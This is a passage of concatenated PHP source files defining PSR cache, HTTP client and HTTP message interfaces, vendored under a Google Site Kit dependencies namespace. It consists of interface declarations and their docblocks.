cached value for performance reasons. * This could result in a race condition with CacheItemInterface::get(). To avoid * such situation use CacheItemInterface::isHit() instead. * * @param string $key * The key for which to check existence. * * @throws InvalidArgumentException * If the $key string is not a legal value a \Psr\Cache\InvalidArgumentException * MUST be thrown. * * @return bool * True if item exists in the cache, false otherwise. */ public function hasItem($key); /** * Deletes all items in the pool. * * @return bool * True if the pool was successfully cleared. False if there was an error. */ public function clear(); /** * Removes the item from the pool. * * @param string $key * The key to delete. * * @throws InvalidArgumentException * If the $key string is not a legal value a \Psr\Cache\InvalidArgumentException * MUST be thrown. * * @return bool * True if the item was successfully removed. False if there was an error. */ public function deleteItem($key); /** * Removes multiple items from the pool. * * @param string[] $keys * An array of keys that should be removed from the pool. * @throws InvalidArgumentException * If any of the keys in $keys are not a legal value a \Psr\Cache\InvalidArgumentException * MUST be thrown. * * @return bool * True if the items were successfully removed. False if there was an error. */ public function deleteItems(array $keys); /** * Persists a cache item immediately. * * @param CacheItemInterface $item * The cache item to save. * * @return bool * True if the item was successfully persisted. False if there was an error. */ public function save(\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface $item); /** * Sets a cache item to be persisted later. * * @param CacheItemInterface $item * The cache item to save. * * @return bool * False if the item could not be queued or if a commit was attempted and failed. True otherwise. */ public function saveDeferred(\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface $item); /** * Persists any deferred cache items. * * @return bool * True if all not-yet-saved items were successfully saved or there were none. False otherwise. */ public function commit(); } <?php namespace Google\Site_Kit_Dependencies\Psr\Cache; /** * Exception interface for all exceptions thrown by an Implementing Library. */ interface CacheException { } <?php namespace Google\Site_Kit_Dependencies\Psr\Cache; /** * Exception interface for invalid cache arguments. * * Any time an invalid argument is passed into a method it must throw an * exception class which implements Psr\Cache\InvalidArgumentException. */ interface InvalidArgumentException extends \Google\Site_Kit_Dependencies\Psr\Cache\CacheException { } <?php namespace Google\Site_Kit_Dependencies\Psr\Cache; /** * CacheItemInterface defines an interface for interacting with objects inside a cache. * * Each Item object MUST be associated with a specific key, which can be set * according to the implementing system and is typically passed by the * Cache\CacheItemPoolInterface object. * * The Cache\CacheItemInterface object encapsulates the storage and retrieval of * cache items. Each Cache\CacheItemInterface is generated by a * Cache\CacheItemPoolInterface object, which is responsible for any required * setup as well as associating the object with a unique Key. * Cache\CacheItemInterface objects MUST be able to store and retrieve any type * of PHP value defined in the Data section of the specification. * * Calling Libraries MUST NOT instantiate Item objects themselves. They may only * be requested from a Pool object via the getItem() method. Calling Libraries * SHOULD NOT assume that an Item created by one Implementing Library is * compatible with a Pool from another Implementing Library. */ interface CacheItemInterface { /** * Returns the key for the current cache item. * * The key is loaded by the Implementing Library, but should be available to * the higher level callers when needed. * * @return string * The key string for this cache item. */ public function getKey(); /** * Retrieves the value of the item from the cache associated with this object's key. * * The value returned must be identical to the value originally stored by set(). * * If isHit() returns false, this method MUST return null. Note that null * is a legitimate cached value, so the isHit() method SHOULD be used to * differentiate between "null value was found" and "no value was found." * * @return mixed * The value corresponding to this cache item's key, or null if not found. */ public function get(); /** * Confirms if the cache item lookup resulted in a cache hit. * * Note: This method MUST NOT have a race condition between calling isHit() * and calling get(). * * @return bool * True if the request resulted in a cache hit. False otherwise. */ public function isHit(); /** * Sets the value represented by this cache item. * * The $value argument may be any item that can be serialized by PHP, * although the method of serialization is left up to the Implementing * Library. * * @param mixed $value * The serializable value to be stored. * * @return static * The invoked object. */ public function set($value); /** * Sets the expiration time for this cache item. * * @param \DateTimeInterface|null $expiration * The point in time after which the item MUST be considered expired. * If null is passed explicitly, a default value MAY be used. If none is set, * the value should be stored permanently or for as long as the * implementation allows. * * @return static * The called object. */ public function expiresAt($expiration); /** * Sets the expiration time for this cache item. * * @param int|\DateInterval|null $time * The period of time from the present after which the item MUST be considered * expired. An integer parameter is understood to be the time in seconds until * expiration. If null is passed explicitly, a default value MAY be used. * If none is set, the value should be stored permanently or for as long as the * implementation allows. * * @return static * The called object. */ public function expiresAfter($time); } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Client; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Exception for when a request failed. * * Examples: * - Request is invalid (e.g. method is missing) * - Runtime request errors (e.g. the body stream is not seekable) */ interface RequestExceptionInterface extends \Google\Site_Kit_Dependencies\Psr\Http\Client\ClientExceptionInterface { /** * Returns the request. * * The request object MAY be a different object from the one passed to ClientInterface::sendRequest() * * @return RequestInterface */ public function getRequest() : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Client; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Thrown when the request cannot be completed because of network issues. * * There is no response object as this exception is thrown when no response has been received. * * Example: the target host name can not be resolved or the connection failed. */ interface NetworkExceptionInterface extends \Google\Site_Kit_Dependencies\Psr\Http\Client\ClientExceptionInterface { /** * Returns the request. * * The request object MAY be a different object from the one passed to ClientInterface::sendRequest() * * @return RequestInterface */ public function getRequest() : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Client; /** * Every HTTP client related exception MUST implement this interface. */ interface ClientExceptionInterface extends \Throwable { } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Client; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; interface ClientInterface { /** * Sends a PSR-7 request and returns a PSR-7 response. * * @param RequestInterface $request * * @return ResponseInterface * * @throws \Psr\Http\Client\ClientExceptionInterface If an error happens while processing the request. */ public function sendRequest(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; /** * Representation of an outgoing, client-side request. * * Per the HTTP specification, this interface includes properties for * each of the following: * * - Protocol version * - HTTP method * - URI * - Headers * - Message body * * During construction, implementations MUST attempt to set the Host header from * a provided URI if no Host header is provided. * * Requests are considered immutable; all methods that might change state MUST * be implemented such that they retain the internal state of the current * message and return an instance that contains the changed state. */ interface RequestInterface extends \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface { /** * Retrieves the message's request target. * * Retrieves the message's request-target either as it will appear (for * clients), as it appeared at request (for servers), or as it was * specified for the instance (see withRequestTarget()). * * In most cases, this will be the origin-form of the composed URI, * unless a value was provided to the concrete implementation (see * withRequestTarget() below). * * If no URI is available, and no request-target has been specifically * provided, this method MUST return the string "/". * * @return string */ public function getRequestTarget() : string; /** * Return an instance with the specific request-target. * * If the request needs a non-origin-form request-target — e.g., for * specifying an absolute-form, authority-form, or asterisk-form — * this method may be used to create an instance with the specified * request-target, verbatim. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * changed request target. * * @link http://tools.ietf.org/html/rfc7230#section-5.3 (for the various * request-target forms allowed in request messages) * @param string $requestTarget * @return static */ public function withRequestTarget(string $requestTarget) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Retrieves the HTTP method of the request. * * @return string Returns the request method. */ public function getMethod() : string; /** * Return an instance with the provided HTTP method. * * While HTTP method names are typically all uppercase characters, HTTP * method names are case-sensitive and thus implementations SHOULD NOT * modify the given string. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * changed request method. * * @param string $method Case-sensitive method. * @return static * @throws \InvalidArgumentException for invalid HTTP methods. */ public function withMethod(string $method) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Retrieves the URI instance. * * This method MUST return a UriInterface instance. * * @link http://tools.ietf.org/html/rfc3986#section-4.3 * @return UriInterface Returns a UriInterface instance * representing the URI of the request. */ public function getUri() : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Returns an instance with the provided URI. * * This method MUST update the Host header of the returned request by * default if the URI contains a host component. If the URI does not * contain a host component, any pre-existing Host header MUST be carried * over to the returned request. * * You can opt-in to preserving the original state of the Host header by * setting `$preserveHost` to `true`. When `$preserveHost` is set to * `true`, this method interacts with the Host header in the following ways: * * - If the Host header is missing or empty, and the new URI contains * a host component, this method MUST update the Host header in the returned * request. * - If the Host header is missing or empty, and the new URI does not contain a * host component, this method MUST NOT update the Host header in the returned * request. * - If a Host header is present and non-empty, this method MUST NOT update * the Host header in the returned request. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * new UriInterface instance. * * @link http://tools.ietf.org/html/rfc3986#section-4.3 * @param UriInterface $uri New request URI to use. * @param bool $preserveHost Preserve the original state of the Host header. * @return static */ public function withUri(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, bool $preserveHost = \false) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; /** * Value object representing a URI. * * This interface is meant to represent URIs according to RFC 3986 and to * provide methods for most common operations. Additional functionality for * working with URIs can be provided on top of the interface or externally. * Its primary use is for HTTP requests, but may also be used in other * contexts. * * Instances of this interface are considered immutable; all methods that * might change state MUST be implemented such that they retain the internal * state of the current instance and return an instance that contains the * changed state. * * Typically the Host header will be also be present in the request message. * For server-side requests, the scheme will typically be discoverable in the * server parameters. * * @link http://tools.ietf.org/html/rfc3986 (the URI specification) */ interface UriInterface { /** * Retrieve the scheme component of the URI. * * If no scheme is present, this method MUST return an empty string. * * The value returned MUST be normalized to lowercase, per RFC 3986 * Section 3.1. * * The trailing ":" character is not part of the scheme and MUST NOT be * added. * * @see https://tools.ietf.org/html/rfc3986#section-3.1 * @return string The URI scheme. */ public function getScheme() : string; /** * Retrieve the authority component of the URI. * * If no authority information is present, this method MUST return an empty * string. * * The authority syntax of the URI is: * * <pre> * [user-info@]host[:port] * </pre> * * If the port component is not set or is the standard port for the current * scheme, it SHOULD NOT be included. * * @see https://tools.ietf.org/html/rfc3986#section-3.2 * @return string The URI authority, in "[user-info@]host[:port]" format. */ public function getAuthority() : string; /** * Retrieve the user information component of the URI. * * If no user information is present, this method MUST return an empty * string. * * If a user is present in the URI, this will return that value; * additionally, if the password is also present, it will be appended to the * user value, with a colon (":") separating the values. * * The trailing "@" character is not part of the user information and MUST * NOT be added. * * @return string The URI user information, in "username[:password]" format. */ public function getUserInfo() : string; /** * Retrieve the host component of the URI. * * If no host is present, this method MUST return an empty string. * * The value returned MUST be normalized to lowercase, per RFC 3986 * Section 3.2.2. * * @see http://tools.ietf.org/html/rfc3986#section-3.2.2 * @return string The URI host. */ public function getHost() : string; /** * Retrieve the port component of the URI. * * If a port is present, and it is non-standard for the current scheme, * this method MUST return it as an integer. If the port is the standard port * used with the current scheme, this method SHOULD return null. * * If no port is present, and no scheme is present, this method MUST return * a null value. * * If no port is present, but a scheme is present, this method MAY return * the standard port for that scheme, but SHOULD return null. * * @return null|int The URI port. */ public function getPort() : ?int; /** * Retrieve the path component of the URI. * * The path can either be empty or absolute (starting with a slash) or * rootless (not starting with a slash). Implementations MUST support all * three syntaxes. * * Normally, the empty path "" and absolute path "/" are considered equal as * defined in RFC 7230 Section 2.7.3. But this method MUST NOT automatically * do this normalization because in contexts with a trimmed base path, e.g. * the front controller, this difference becomes significant. It's the task * of the user to handle both "" and "/". * * The value returned MUST be percent-encoded, but MUST NOT double-encode * any characters. To determine what characters to encode, please refer to * RFC 3986, Sections 2 and 3.3. * * As an example, if the value should include a slash ("/") not intended as * delimiter between path segments, that value MUST be passed in encoded * form (e.g., "%2F") to the instance. * * @see https://tools.ietf.org/html/rfc3986#section-2 * @see https://tools.ietf.org/html/rfc3986#section-3.3 * @return string The URI path. */ public function getPath() : string; /** * Retrieve the query string of the URI. * * If no query string is present, this method MUST return an empty string. * * The leading "?" character is not part of the query and MUST NOT be * added. * * The value returned MUST be percent-encoded, but MUST NOT double-encode * any characters. To determine what characters to encode, please refer to * RFC 3986, Sections 2 and 3.4. * * As an example, if a value in a key/value pair of the query string should * include an ampersand ("&") not intended as a delimiter between values, * that value MUST be passed in encoded form (e.g., "%26") to the instance. * * @see https://tools.ietf.org/html/rfc3986#section-2 * @see https://tools.ietf.org/html/rfc3986#section-3.4 * @return string The URI query string. */ public function getQuery() : string; /** * Retrieve the fragment component of the URI. * * If no fragment is present, this method MUST return an empty string. * * The leading "#" character is not part of the fragment and MUST NOT be * added. * * The value returned MUST be percent-encoded, but MUST NOT double-encode * any characters. To determine what characters to encode, please refer to * RFC 3986, Sections 2 and 3.5. * * @see https://tools.ietf.org/html/rfc3986#section-2 * @see https://tools.ietf.org/html/rfc3986#section-3.5 * @return string The URI fragment. */ public function getFragment() : string; /** * Return an instance with the specified scheme. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified scheme. * * Implementations MUST support the schemes "http" and "https" case * insensitively, and MAY accommodate other schemes if required. * * An empty scheme is equivalent to removing the scheme. * * @param string $scheme The scheme to use with the new instance. * @return static A new instance with the specified scheme. * @throws \InvalidArgumentException for invalid or unsupported schemes. */ public function withScheme(string $scheme) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Return an instance with the specified user information. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified user information. * * Password is optional, but the user information MUST include the * user; an empty string for the user is equivalent to removing user * information. * * @param string $user The user name to use for authority. * @param null|string $password The password associated with $user. * @return static A new instance with the specified user information. */ public function withUserInfo(string $user, ?string $password = null) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Return an instance with the specified host. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified host. * * An empty host value is equivalent to removing the host. * * @param string $host The hostname to use with the new instance. * @return static A new instance with the specified host. * @throws \InvalidArgumentException for invalid hostnames. */ public function withHost(string $host) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Return an instance with the specified port. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified port. * * Implementations MUST raise an exception for ports outside the * established TCP and UDP port ranges. * * A null value provided for the port is equivalent to removing the port * information. * * @param null|int $port The port to use with the new instance; a null value * removes the port information. * @return static A new instance with the specified port. * @throws \InvalidArgumentException for invalid ports. */ public function withPort(?int $port) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Return an instance with the specified path. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified path. * * The path can either be empty or absolute (starting with a slash) or * rootless (not starting with a slash). Implementations MUST support all * three syntaxes. * * If the path is intended to be domain-relative rather than path relative then * it must begin with a slash ("/"). Paths not starting with a slash ("/") * are assumed to be relative to some base path known to the application or * consumer. * * Users can provide both encoded and decoded path characters. * Implementations ensure the correct encoding as outlined in getPath(). * * @param string $path The path to use with the new instance. * @return static A new instance with the specified path. * @throws \InvalidArgumentException for invalid paths. */ public function withPath(string $path) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Return an instance with the specified query string. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified query string. * * Users can provide both encoded and decoded query characters. * Implementations ensure the correct encoding as outlined in getQuery(). * * An empty query string value is equivalent to removing the query string. * * @param string $query The query string to use with the new instance. * @return static A new instance with the specified query string. * @throws \InvalidArgumentException for invalid query strings. */ public function withQuery(string $query) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Return an instance with the specified URI fragment. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified URI fragment. * * Users can provide both encoded and decoded fragment characters. * Implementations ensure the correct encoding as outlined in getFragment(). * * An empty fragment value is equivalent to removing the fragment. * * @param string $fragment The fragment to use with the new instance. * @return static A new instance with the specified fragment. */ public function withFragment(string $fragment) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Return the string representation as a URI reference. * * Depending on which components of the URI are present, the resulting * string is either a full URI or relative reference according to RFC 3986, * Section 4.1. The method concatenates the various components of the URI, * using the appropriate delimiters: * * - If a scheme is present, it MUST be suffixed by ":". * - If an authority is present, it MUST be prefixed by "//". * - The path can be concatenated without delimiters. But there are two * cases where the path has to be adjusted to make the URI reference * valid as PHP does not allow to throw an exception in __toString(): * - If the path is rootless and an authority is present, the path MUST * be prefixed by "/". * - If the path is starting with more than one "/" and no authority is * present, the starting slashes MUST be reduced to one. * - If a query is present, it MUST be prefixed by "?". * - If a fragment is present, it MUST be prefixed by "#". * * @see http://tools.ietf.org/html/rfc3986#section-4.1 * @return string */ public function __toString() : string; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; /** * Representation of an incoming, server-side HTTP request. * * Per the HTTP specification, this interface includes properties for * each of the following: * * - Protocol version * - HTTP method * - URI * - Headers * - Message body * * Additionally, it encapsulates all data as it has arrived to the * application from the CGI and/or PHP environment, including: * * - The values represented in $_SERVER. * - Any cookies provided (generally via $_COOKIE) * - Query string arguments (generally via $_GET, or as parsed via parse_str()) * - Upload files, if any (as represented by $_FILES) * - Deserialized body parameters (generally from $_POST) * * $_SERVER values MUST be treated as immutable, as they represent application * state at the time of request; as such, no methods are provided to allow * modification of those values. The other values provide such methods, as they * can be restored from $_SERVER or the request body, and may need treatment * during the application (e.g., body parameters may be deserialized based on * content type). * * Additionally, this interface recognizes the utility of introspecting a * request to derive and match additional parameters (e.g., via URI path * matching, decrypting cookie values, deserializing non-form-encoded body * content, matching authorization headers to users, etc). These parameters * are stored in an "attributes" property. * * Requests are considered immutable; all methods that might change state MUST * be implemented such that they retain the internal state of the current * message and return an instance that contains the changed state. */ interface ServerRequestInterface extends \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { /** * Retrieve server parameters. * * Retrieves data related to the incoming request environment, * typically derived from PHP's $_SERVER superglobal. The data IS NOT * REQUIRED to originate from $_SERVER. * * @return array */ public function getServerParams() : array; /** * Retrieve cookies. * * Retrieves cookies sent by the client to the server. * * The data MUST be compatible with the structure of the $_COOKIE * superglobal. * * @return array */ public function getCookieParams() : array; /** * Return an instance with the specified cookies. * * The data IS NOT REQUIRED to come from the $_COOKIE superglobal, but MUST * be compatible with the structure of $_COOKIE. Typically, this data will * be injected at instantiation. * * This method MUST NOT update the related Cookie header of the request * instance, nor related values in the server params. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated cookie values. * * @param array $cookies Array of key/value pairs representing cookies. * @return static */ public function withCookieParams(array $cookies) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; /** * Retrieve query string arguments. * * Retrieves the deserialized query string arguments, if any. * * Note: the query params might not be in sync with the URI or server * params. If you need to ensure you are only getting the original * values, you may need to parse the query string from `getUri()->getQuery()` * or from the `QUERY_STRING` server param. * * @return array */ public function getQueryParams() : array; /** * Return an instance with the specified query string arguments. * * These values SHOULD remain immutable over the course of the incoming * request. They MAY be injected during instantiation, such as from PHP's * $_GET superglobal, or MAY be derived from some other value such as the * URI. In cases where the arguments are parsed from the URI, the data * MUST be compatible with what PHP's parse_str() would return for * purposes of how duplicate query parameters are handled, and how nested * sets are handled. * * Setting query string arguments MUST NOT change the URI stored by the * request, nor the values in the server params. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated query string arguments. * * @param array $query Array of query string arguments, typically from * $_GET. * @return static */ public function withQueryParams(array $query) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; /** * Retrieve normalized file upload data. * * This method returns upload metadata in a normalized tree, with each leaf * an instance of Psr\Http\Message\UploadedFileInterface. * * These values MAY be prepared from $_FILES or the message body during * instantiation, or MAY be injected via withUploadedFiles(). * * @return array An array tree of UploadedFileInterface instances; an empty * array MUST be returned if no data is present. */ public function getUploadedFiles() : array; /** * Create a new instance with the specified uploaded files. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated body parameters. * * @param array $uploadedFiles An array tree of UploadedFileInterface instances. * @return static * @throws \InvalidArgumentException if an invalid structure is provided. */ public function withUploadedFiles(array $uploadedFiles) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; /** * Retrieve any parameters provided in the request body. * * If the request Content-Type is either application/x-www-form-urlencoded * or multipart/form-data, and the request method is POST, this method MUST * return the contents of $_POST. * * Otherwise, this method may return any results of deserializing * the request body content; as parsing returns structured content, the * potential types MUST be arrays or objects only. A null value indicates * the absence of body content. * * @return null|array|object The deserialized body parameters, if any. * These will typically be an array or object. */ public function getParsedBody(); /** * Return an instance with the specified body parameters. * * These MAY be injected during instantiation. * * If the request Content-Type is either application/x-www-form-urlencoded * or multipart/form-data, and the request method is POST, use this method * ONLY to inject the contents of $_POST. * * The data IS NOT REQUIRED to come from $_POST, but MUST be the results of * deserializing the request body content. Deserialization/parsing returns * structured data, and, as such, this method ONLY accepts arrays or objects, * or a null value if nothing was available to parse. * * As an example, if content negotiation determines that the request data * is a JSON payload, this method could be used to create a request * instance with the deserialized parameters. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated body parameters. * * @param null|array|object $data The deserialized body data. This will * typically be in an array or object. * @return static * @throws \InvalidArgumentException if an unsupported argument type is * provided. */ public function withParsedBody($data) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; /** * Retrieve attributes derived from the request. * * The request "attributes" may be used to allow injection of any * parameters derived from the request: e.g., the results of path * match operations; the results of decrypting cookies; the results of * deserializing non-form-encoded message bodies; etc. Attributes * will be application and request specific, and CAN be mutable. * * @return array Attributes derived from the request. */ public function getAttributes() : array; /** * Retrieve a single derived request attribute. * * Retrieves a single derived request attribute as described in * getAttributes(). If the attribute has not been previously set, returns * the default value as provided. * * This method obviates the need for a hasAttribute() method, as it allows * specifying a default value to return if the attribute is not found. * * @see getAttributes() * @param string $name The attribute name. * @param mixed $default Default value to return if the attribute does not exist. * @return mixed */ public function getAttribute(string $name, $default = null); /** * Return an instance with the specified derived request attribute. * * This method allows setting a single derived request attribute as * described in getAttributes(). * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated attribute. * * @see getAttributes() * @param string $name The attribute name. * @param mixed $value The value of the attribute. * @return static */ public function withAttribute(string $name, $value) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; /** * Return an instance that removes the specified derived request attribute. * * This method allows removing a single derived request attribute as * described in getAttributes(). * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that removes * the attribute. * * @see getAttributes() * @param string $name The attribute name. * @return static */ public function withoutAttribute(string $name) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; /** * Describes a data stream. * * Typically, an instance will wrap a PHP stream; this interface provides * a wrapper around the most common operations, including serialization of * the entire stream to a string. */ interface StreamInterface { /** * Reads all data from the stream into a string, from the beginning to end. * * This method MUST attempt to seek to the beginning of the stream before * reading data and read the stream until the end is reached. * * Warning: This could attempt to load a large amount of data into memory. * * This method MUST NOT raise an exception in order to conform with PHP's * string casting operations. * * @see http://php.net/manual/en/language.oop5.magic.php#object.tostring * @return string */ public function __toString() : string; /** * Closes the stream and any underlying resources. * * @return void */ public function close() : void; /** * Separates any underlying resources from the stream. * * After the stream has been detached, the stream is in an unusable state. * * @return resource|null Underlying PHP stream, if any */ public function detach(); /** * Get the size of the stream if known. * * @return int|null Returns the size in bytes if known, or null if unknown. */ public function getSize() : ?int; /** * Returns the current position of the file read/write pointer * * @return int Position of the file pointer * @throws \RuntimeException on error. */ public function tell() : int; /** * Returns true if the stream is at the end of the stream. * * @return bool */ public function eof() : bool; /** * Returns whether or not the stream is seekable. * * @return bool */ public function isSeekable() : bool; /** * Seek to a position in the stream. * * @link http://www.php.net/manual/en/function.fseek.php * @param int $offset Stream offset * @param int $whence Specifies how the cursor position will be calculated * based on the seek offset. Valid values are identical to the built-in * PHP $whence values for `fseek()`. SEEK_SET: Set position equal to * offset bytes SEEK_CUR: Set position to current location plus offset * SEEK_END: Set position to end-of-stream plus offset. * @throws \RuntimeException on failure. */ public function seek(int $offset, int $whence = \SEEK_SET) : void; /** * Seek to the beginning of the stream. * * If the stream is not seekable, this method will raise an exception; * otherwise, it will perform a seek(0). * * @see seek() * @link http://www.php.net/manual/en/function.fseek.php * @throws \RuntimeException on failure. */ public function rewind() : void; /** * Returns whether or not the stream is writable. * * @return bool */ public function isWritable() : bool; /** * Write data to the stream. * * @param string $string The string that is to be written. * @return int Returns the number of bytes written to the stream. * @throws \RuntimeException on failure. */ public function write(string $string) : int; /** * Returns whether or not the stream is readable. * * @return bool */ public function isReadable() : bool; /** * Read data from the stream. * * @param int $length Read up to $length bytes from the object and return * them. Fewer than $length bytes may be returned if underlying stream * call returns fewer bytes. * @return string Returns the data read from the stream, or an empty string * if no bytes are available. * @throws \RuntimeException if an error occurs. */ public function read(int $length) : string; /** * Returns the remaining contents in a string * * @return string * @throws \RuntimeException if unable to read or an error occurs while * reading. */ public function getContents() : string; /** * Get stream metadata as an associative array or retrieve a specific key. * * The keys returned are identical to the keys returned from PHP's * stream_get_meta_data() function. * * @link http://php.net/manual/en/function.stream-get-meta-data.php * @param string|null $key Specific metadata to retrieve. * @return array|mixed|null Returns an associative array if no key is * provided. Returns a specific key value if a key is provided and the * value is found, or null if the key is not found. */ public function getMetadata(?string $key = null); } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; /** * Value object representing a file uploaded through an HTTP request. * * Instances of this interface are considered immutable; all methods that * might change state MUST be implemented such that they retain the internal * state of the current instance and return an instance that contains the * changed state. */ interface UploadedFileInterface { /** * Retrieve a stream representing the uploaded file. * * This method MUST return a StreamInterface instance, representing the * uploaded file. The purpose of this method is to allow utilizing native PHP * stream functionality to manipulate the file upload, such as * stream_copy_to_stream() (though the result will need to be decorated in a * native PHP stream wrapper to work with such functions). * * If the moveTo() method has been called previously, this method MUST raise * an exception. * * @return StreamInterface Stream representation of the uploaded file. * @throws \RuntimeException in cases when no stream is available or can be * created. */ public function getStream() : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Move the uploaded file to a new location. * * Use this method as an alternative to move_uploaded_file(). This method is * guaranteed to work in both SAPI and non-SAPI environments. * Implementations must determine which environment they are in, and use the * appropriate method (move_uploaded_file(), rename(), or a stream * operation) to perform the operation. * * $targetPath may be an absolute path, or a relative path. If it is a * relative path, resolution should be the same as used by PHP's rename() * function. * * The original file or stream MUST be removed on completion. * * If this method is called more than once, any subsequent calls MUST raise * an exception. * * When used in an SAPI environment where $_FILES is populated, when writing * files via moveTo(), is_uploaded_file() and move_uploaded_file() SHOULD be * used to ensure permissions and upload status are verified correctly. * * If you wish to move to a stream, use getStream(), as SAPI operations * cannot guarantee writing to stream destinations. * * @see http://php.net/is_uploaded_file * @see http://php.net/move_uploaded_file * @param string $targetPath Path to which to move the uploaded file. * @throws \InvalidArgumentException if the $targetPath specified is invalid. * @throws \RuntimeException on any error during the move operation, or on * the second or subsequent call to the method. */ public function moveTo(string $targetPath) : void; /** * Retrieve the file size. * * Implementations SHOULD return the value stored in the "size" key of * the file in the $_FILES array if available, as PHP calculates this based * on the actual size transmitted. * * @return int|null The file size in bytes or null if unknown. */ public function getSize() : ?int; /** * Retrieve the error associated with the uploaded file. * * The return value MUST be one of PHP's UPLOAD_ERR_XXX constants. * * If the file was uploaded successfully, this method MUST return * UPLOAD_ERR_OK. * * Implementations SHOULD return the value stored in the "error" key of * the file in the $_FILES array. * * @see http://php.net/manual/en/features.file-upload.errors.php * @return int One of PHP's UPLOAD_ERR_XXX constants. */ public function getError() : int; /** * Retrieve the filename sent by the client. * * Do not trust the value returned by this method. A client could send * a malicious filename with the intention to corrupt or hack your * application. * * Implementations SHOULD return the value stored in the "name" key of * the file in the $_FILES array. * * @return string|null The filename sent by the client or null if none * was provided. */ public function getClientFilename() : ?string; /** * Retrieve the media type sent by the client. * * Do not trust the value returned by this method. A client could send * a malicious media type with the intention to corrupt or hack your * application. * * Implementations SHOULD return the value stored in the "type" key of * the file in the $_FILES array. * * @return string|null The media type sent by the client or null if none * was provided. */ public function getClientMediaType() : ?string; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; /** * Representation of an outgoing, server-side response. * * Per the HTTP specification, this interface includes properties for * each of the following: * * - Protocol version * - Status code and reason phrase * - Headers * - Message body * * Responses are considered immutable; all methods that might change state MUST * be implemented such that they retain the internal state of the current * message and return an instance that contains the changed state. */ interface ResponseInterface extends \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface { /** * Gets the response status code. * * The status code is a 3-digit integer result code of the server's attempt * to understand and satisfy the request. * * @return int Status code. */ public function getStatusCode() : int; /** * Return an instance with the specified status code and, optionally, reason phrase. * * If no reason phrase is specified, implementations MAY choose to default * to the RFC 7231 or IANA recommended reason phrase for the response's * status code. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated status and reason phrase. * * @link http://tools.ietf.org/html/rfc7231#section-6 * @link http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml * @param int $code The 3-digit integer result code to set. * @param string $reasonPhrase The reason phrase to use with the * provided status code; if none is provided, implementations MAY * use the defaults as suggested in the HTTP specification. * @return static * @throws \InvalidArgumentException For invalid status code arguments. */ public function withStatus(int $code, string $reasonPhrase = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Gets the response reason phrase associated with the status code. * * Because a reason phrase is not a required element in a response * status line, the reason phrase value MAY be null. Implementations MAY * choose to return the default RFC 7231 recommended reason phrase (or those * listed in the IANA HTTP Status Code Registry) for the response's * status code. * * @link http://tools.ietf.org/html/rfc7231#section-6 * @link http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml * @return string Reason phrase; must return an empty 